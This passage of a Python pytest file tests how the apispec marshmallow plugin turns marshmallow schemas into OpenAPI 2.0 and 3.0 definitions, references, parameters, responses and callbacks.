spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference_return_none(self, schema):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
with pytest.raises(
APISpecError, match="Name resolver returned None for schema"
):
spec.components.schema("analysis", schema=schema)
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_warning_when_schema_added_twice(self, spec, schema):
spec.components.schema("Analysis", schema=schema)
with pytest.warns(UserWarning, match="has already been added to the spec"):
spec.components.schema("DuplicateAnalysis", schema=schema)
def test_schema_instances_with_different_modifiers_added(self, spec):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema, exclude=("name",))
spec.components.schema("Pet", schema=PetSchema())
spec.components.schema("Pet_Exclude", schema=PetSchema(exclude=("name",)))
spec.components.schema("MultiModifierSchema", schema=MultiModifierSchema)
definitions = get_schemas(spec)
pet_unmodified_ref = definitions["MultiModifierSchema"]["properties"][
"pet_unmodified"
]
assert pet_unmodified_ref == build_ref(spec, "schema", "Pet")
pet_exclude = definitions["MultiModifierSchema"]["properties"]["pet_exclude"]
assert pet_exclude == build_ref(spec, "schema", "Pet_Exclude")
    def test_schema_instance_with_different_modifiers_custom_resolver(self):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema(partial=True))
def resolver(schema):
schema_instance = common.resolve_schema_instance(schema)
prefix = "Partial-" if schema_instance.partial else ""
schema_cls = common.resolve_schema_cls(schema)
name = prefix + schema_cls.__name__
if name.endswith("Schema"):
return name[:-6] or name
return name
spec = APISpec(
title="Test Custom Resolver for Partial",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.warns(None) as record:
spec.components.schema("NameClashSchema", schema=MultiModifierSchema)
assert len(record) == 0
def test_schema_with_clashing_names(self, spec):
class Pet(PetSchema):
another_field = String()
class NameClashSchema(Schema):
pet_1 = Nested(PetSchema)
pet_2 = Nested(Pet)
with pytest.warns(
UserWarning, match="Multiple schemas resolved to the name Pet"
):
spec.components.schema("NameClashSchema", schema=NameClashSchema)
definitions = get_schemas(spec)
assert "Pet" in definitions
assert "Pet1" in definitions
def test_resolve_nested_schema_many_true_resolver_return_none(self):
def resolver(schema):
return None
class PetFamilySchema(Schema):
pets_1 = Nested(PetSchema, many=True)
pets_2 = List(Nested(PetSchema))
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("PetFamily", schema=PetFamilySchema)
props = get_schemas(spec)["PetFamily"]["properties"]
pets_1 = props["pets_1"]
pets_2 = props["pets_2"]
assert pets_1["type"] == pets_2["type"] == "array"
class TestComponentParameterHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_parameter(self, spec, schema):
if spec.openapi_version.major < 3:
param = {"schema": schema}
else:
param = {"content": {"application/json": {"schema": schema}}}
spec.components.parameter("Pet", "body", param)
parameter = get_parameters(spec)["Pet"]
assert parameter["in"] == "body"
if spec.openapi_version.major < 3:
reference = parameter["schema"]
else:
reference = parameter["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
assert resolved_schema["properties"]["id"]["type"] == "integer"
class TestComponentResponseHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response(self, spec, schema):
if spec.openapi_version.major < 3:
resp = {"schema": schema}
else:
resp = {"content": {"application/json": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
if spec.openapi_version.major < 3:
reference = response["schema"]
else:
reference = response["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response_header(self, spec, schema):
resp = {"headers": {"PetHeader": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
reference = response["headers"]["PetHeader"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("spec", ("3.0.0",), indirect=True)
def test_content_without_schema(self, spec):
resp = {"content": {"application/json": {"example": {"name": "Example"}}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
assert response == resp
class TestCustomField:
def test_can_use_custom_field_decorator(self, spec_fixture):
@spec_fixture.marshmallow_plugin.map_to_openapi_type(DateTime)
class CustomNameA(Field):
pass
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer", "int32")
class CustomNameB(Field):
pass
with pytest.raises(TypeError):
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer")
class BadCustomField(Field):
pass
class CustomPetASchema(PetSchema):
name = CustomNameA()
class CustomPetBSchema(PetSchema):
name = CustomNameB()
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.components.schema("CustomPetA", schema=CustomPetASchema)
spec_fixture.spec.components.schema("CustomPetB", schema=CustomPetBSchema)
props_0 = get_schemas(spec_fixture.spec)["Pet"]["properties"]
props_a = get_schemas(spec_fixture.spec)["CustomPetA"]["properties"]
props_b = get_schemas(spec_fixture.spec)["CustomPetB"]["properties"]
assert props_0["name"]["type"] == "string"
assert "format" not in props_0["name"]
assert props_a["name"]["type"] == "string"
assert props_a["name"]["format"] == "date-time"
assert props_b["name"]["type"] == "integer"
assert props_b["name"]["format"] == "int32"
def get_nested_schema(schema, field_name):
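    # The attribute that holds a Nested field's schema is private and its name
    # has varied across marshmallow versions (assumption: some releases expose
    # it as _schema, others as the name-mangled _Nested__schema), hence the
    # fallback below.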
try:
return schema._declared_fields[field_name]._schema
except AttributeError:
return schema._declared_fields[field_name]._Nested__schema
class TestOperationHelper:
@pytest.fixture
def make_pet_callback_spec(self, spec_fixture):
def _make_pet_spec(operations):
spec_fixture.spec.path(
path="/pet",
operations={
"post": {"callbacks": {"petEvent": {"petCallbackUrl": operations}}}
},
)
return spec_fixture
return _make_pet_spec
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_v2(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"schema": pet_schema,
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert get["responses"]["200"]["schema"]["type"] == "array"
schema_reference = get["responses"]["200"]["schema"]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["schema"]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_v3(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_v3(self, make_pet_callback_spec, pet_schema):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_expand_parameters_v2(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"parameters": [
{
"in": "body",
"description": "a pet schema",
"required": True,
"name": "pet",
"schema": PetSchema,
}
]
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
post = p["post"]
assert post["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema,
location="body",
required=True,
name="pet",
description="a pet schema",
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_expand_parameters_v3(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = p["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_expand_parameters_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = c["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_if_available_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {"content": {"application/json": {"schema": PetSchema}}}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v2(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v2(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={"get": {"responses": {200: {"schema": pet_schema}}}},
)
get = get_paths(spec)["/pet"]["get"]
assert "properties" in get["responses"]["200"]["schema"]
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v3(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": pet_schema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert (
"properties"
in get["responses"]["200"]["content"]["application/json"]["schema"]
)
def test_callback_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"post": {
"callbacks": {
"petEvent": {
"petCallbackUrl": {
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": PetSchema
}
}
}
}
}
}
}
}
}
},
)
p = get_paths(spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v2(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {"parameters": [{"in": "body", "schema": PetSchema}]},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" not in p["get"]["parameters"][0]
post = p["post"]
assert len(post["parameters"]) == 1
assert post["parameters"][0]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" in p["get"]["parameters"][0]
post = p["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
assert "schema" in c["get"]["parameters"][0]
post = c["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "petSchema",
"in": "body",
"schema": {"type": "array", "items": PetSchema},
}
],
"responses": {
200: {"schema": {"type": "array", "items": PetSchema}}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
assert get["parameters"][0]["schema"] == resolved_schema
assert get["responses"]["200"]["schema"] == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
200: {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_array_uses_ref_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
"200": {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_partially_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_partially_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_partially_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
def test_parameter_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
param = {"schema": PetSchema}
else:
param = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.parameter("Pet", "body", param)
spec_fixture.spec.path(
path="/parents", operations={"get": {"parameters": ["Pet"]}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["parameters"] == [build_ref(spec_fixture.spec, "parameter", "Pet")]
def test_response_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
resp = {"schema": PetSchema}
else:
resp = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.response("Pet", resp)
spec_fixture.spec.path(
path="/parents", operations={"get": {"responses": {"200": "Pet"}}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"] == {
"200": build_ref(spec_fixture.spec, "response", "Pet")
}
def test_schema_global_state_untouched_2json(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2jsonschema(RunSchema)
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_schema_global_state_untouched_2parameters(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2parameters(RunSchema, location="json")
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_resolve_schema_dict_ref_as_string(self, spec):
schema = {"schema": "PetSchema"}
if spec.openapi_version.major >= 3:
schema = {"content": {"application/json": schema}}
spec.path("/pet/{petId}", operations={"get": {"responses": {"200": schema}}})
resp = get_paths(spec)["/pet/{petId}"]["get"]["responses"]["200"]
if spec.openapi_version.major < 3:
schema = resp["schema"]
else:
schema = resp["content"]["application/json"]["schema"]
assert schema == build_ref(spec, "schema", "PetSchema")
class TestCircularReference:
def test_circular_referencing_schemas(self, spec):
spec.components.schema("Analysis", schema=AnalysisSchema)
definitions = get_schemas(spec)
ref = definitions["Analysis"]["properties"]["sample"]
assert ref == build_ref(spec, "schema", "Sample")
# Regression tests for issue #55
class TestSelfReference:
def test_self_referencing_field_single(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
ref = definitions["SelfReference"]["properties"]["single"]
assert ref == build_ref(spec, "schema", "SelfReference")
def test_self_referencing_field_many(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
result = definitions["SelfReference"]["properties"]["many"]
assert result == {
"type": "array",
"items": build_ref(spec, "schema", "SelfReference"),
}
class TestOrderedSchema:
def test_ordered_schema(self, spec):
spec.components.schema("Ordered", schema=OrderedSchema)
result = get_schemas(spec)["Ordered"]["properties"]
assert list(result.keys()) == ["field1", "field2", "field3", "field4", "field5"]
class TestFieldWithCustomProps:
def test_field_with_custom_props(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count"]
assert "x-count" in result
assert result["x-count"] == 1
def test_field_with_custom_props_passed_as_snake_case(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count2"]
assert "x-count2" in result
assert result["x-count2"] == 2
class TestSchemaWithDefaultValues:
def test_schema_with_default_values(self, spec):
spec.components.schema("DefaultValuesSchema", schema=DefaultValuesSchema)
definitions = get_schemas(spec)
props = definitions["DefaultValuesSchema"]["properties"]
assert props["number_auto_default"]["default"] == 12
assert props["number_manual_default"]["default"] == 42
assert "default" not in props["string_callable_default"]
assert props["string_manual_default"]["default"] == "Manual"
assert "default" not in props["numbers"]
class TestDictValues:
def test_dict_values_resolve_to_additional_properties(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=String())
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object", "additionalProperties": {"type": "string"}}
def test_dict_with_empty_values_field(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict()
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object"}
def test_dict_with_nested(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=Nested(PetSchema))
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {
"additionalProperties": build_ref(spec, "schema", "Pet"),
"type": "object",
}
class TestList:
def test_list_with_nested(self, spec):
class SchemaWithList(Schema):
list_field = List(Nested(PetSchema))
spec.components.schema("SchemaWithList", schema=SchemaWithList)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithList"]["properties"]["list_field"]
assert result == {"items": build_ref(spec, "schema", "Pet"), "type": "array"}
class TestTimeDelta:
def test_timedelta_x_unit(self, spec):
class SchemaWithTimeDelta(Schema):
sec = TimeDelta("seconds")
day = TimeDelta("days")
spec.components.schema("SchemaWithTimeDelta", schema=SchemaWithTimeDelta)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["sec"]["x-unit"]
== "seconds"
)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["day"]["x-unit"]
== "days"
)
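# For reference, a minimal sketch of the build_ref test helper used in the
# assertions above (assumed behavior; the real helper lives in the shared
# test utilities, so this is illustrative only):
def build_ref_sketch(spec, component_type, name):
    """Return the JSON reference apispec emits for a named component."""
    if spec.openapi_version.major < 3:
        prefix = {'schema': '#/definitions/',
                  'parameter': '#/parameters/',
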